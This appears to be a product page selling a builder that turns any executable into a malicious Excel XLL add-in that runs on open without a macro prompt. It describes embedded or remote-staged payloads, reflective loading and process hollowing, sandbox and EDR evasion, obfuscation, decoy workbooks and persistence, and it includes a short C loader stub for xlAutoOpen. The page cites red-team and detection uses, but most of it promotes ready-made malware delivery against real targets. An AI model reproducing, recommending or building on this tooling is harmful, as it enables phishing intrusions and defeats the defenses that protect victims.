An XLL is a native DLL that exposes a documented Excel C API. It is, structurally, a Windows PE file with the extension renamed to .xll. When opened, Excel maps it into its own address space and invokes a fixed set of exported entrypoints — the most important being xlAutoOpen, which is called before any user interaction.
This means an XLL has the same trust posture as a regular DLL loaded by Excel: full access to the Excel process token, network, filesystem, registry, and any Windows API. There is no scripting sandbox, no macro warning bar in many configurations, and no Protected View when the XLL is delivered through methods other than direct download.
VBA, no JScript, no scripting host requiredEXCEL.EXE — a Microsoft-signed, fully-trusted processxlAutoOpen fires › payload runsFrom source executable to deliverable XLL in seconds. Pick your binary, choose options, generate.
Drop in a local PE file (.exe) or supply a remote URL the XLL should fetch on activation.
Pick architecture (x86/x64), execution method, persistence flags, and decoy behavior.
Builder produces a native PE with xlAutoOpen entrypoint, embedded payload (or stager), and obfuscated strings.
Send the .xll via mail, link, or share. Target opens in Excel › payload runs. No VBA prompt.
A look at how the generated XLL behaves at runtime.
The stub exports xlAutoOpen (and optionally xlAutoClose, xlAutoAdd). Excel calls these by name during add-in load — no user click on a content surface, no enable-button required.
Choose between (a) embedded — payload bytes encrypted in the XLL's resource section and decrypted in-memory, or (b) stager — XLL fetches the payload from your URL over TLS and runs it.
Reflective load, CreateProcess with hollow target, manual mapping, or thread-pool callback. Several primitives are selectable per build.
Optional decoy: open a benign workbook from embedded data so the user sees a real spreadsheet while execution happens silently in the background.
String stack-encryption, indirect API resolution via PEB walking + hashing (no plain GetProcAddress), control-flow flattening on critical functions.
Builder produces both x86 and x64 outputs. Excel bitness must match the XLL bitness — choose accordingly or build both.
// Excel resolves and calls xlAutoOpen on add-in load. // No content macros. No VBA prompt. Native code path. __declspec(dllexport) int WINAPI xlAutoOpen(void) { if (Sandbox_Detected()) return 1; // quiet exit unsigned char *blob = Decrypt_Resource("PAY"); // AES + per-build key Reflective_Load(blob, blob_size); // or stager fetch Show_Decoy_Workbook(); // optional UX return 1; }
| Output Format | Native Windows PE (DLL) with .xll extension |
|---|---|
| Architectures | x86 and x64 — match target Excel bitness |
| Office Compatibility | Excel 2010 / 2013 / 2016 / 2019 / 2021 / Microsoft 365 |
| Entrypoint | xlAutoOpen (mandatory), xlAutoClose, xlAutoAdd (optional) |
| Delivery Mode | URL stager (HTTPS fetch on open) · Local embed (encrypted resource section, in-memory load) |
| Execution Primitives | Reflective loader · Process hollow · Manual map · Thread-pool callback |
| Obfuscation | String encryption · API hashing · Control-flow flattening · Per-build polymorphism |
| Decoy Support | Embedded benign .xlsx opened post-execution |
| Anti-Analysis | Sandbox checks, debugger detection, sleep skewing, time-based gating |
| Persistence (optional) | Registry OPEN key under Excel\Options, scheduled task, startup XLL drop |
Authorized engagements where Excel-side delivery is desirable.
Targets running mature EDR but lax Office policy. XLL bypasses VBA-focused detections that don't inspect native add-in loads.
Generate samples to validate Sigma/YARA rules covering xlAutoOpen exports, suspicious DLL loads under EXCEL.EXE, and Office add-in registry artifacts.
Authorized phishing simulations where the lure is a financial spreadsheet — measure click-through and Excel-trust behaviors.
Reproducible XLL test corpora for sandbox tuning, EDR telemetry validation, and DFIR triage practice.
Build challenges around Office trust boundaries, native add-in loaders, and reflective DLL injection.
Replay APT TTPs that historically used XLL delivery (FIN7, TA505, OilRig variants) to test full kill-chain coverage.
vbaProject.bin to inspect.DPB hex to crack, no Dir-stream artifacts. Build artifacts are pure compiled PE.Note. Some hardened Office configurations block .xll add-ins by group policy or via the Office Trust Center. Always validate your delivery vector against the target's policy before relying on XLL exclusively.
All tiers include unlimited builds, every execution primitive, all obfuscation layers, and updates within the term.
Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.
Pick a tier above or talk to us — we'll match the right configuration to your engagement.
